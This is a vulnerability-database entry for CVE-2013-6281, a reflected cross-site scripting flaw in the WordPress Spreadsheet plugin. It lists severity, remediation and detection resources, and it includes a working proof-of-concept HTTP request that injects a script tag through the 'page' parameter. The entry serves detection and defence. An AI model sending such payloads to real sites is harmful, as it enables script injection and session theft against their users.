🔙 목록으로 돌아가기

CVE-2013-6281: WordPress Spreadsheet - Cross-Site Scripting

TitleWordPress Spreadsheet - Cross-Site Scripting
Authorrandom-robbie
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected WordPress site, leading to potential data theft, session hijacking, or defacement.
RemediationUpdate the WordPress Spreadsheet plugin to the latest version, which includes proper input sanitization to mitigate the XSS vulnerability.
CVSS Score4.3
EPSS Score0.08709
CVE IDCVE-2013-6281
CWE IDCWE-79
Tags cve2013 cve wp wpscan wordpress xss wp-plugin dhtmlx vuln

🔍 Vulnerability Description

WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php.

🌐 HTTP Request

GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2013/CVE-2013-6281.yaml

🦈 Packet Capture: ⬇️ Download cve-2013-6281.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A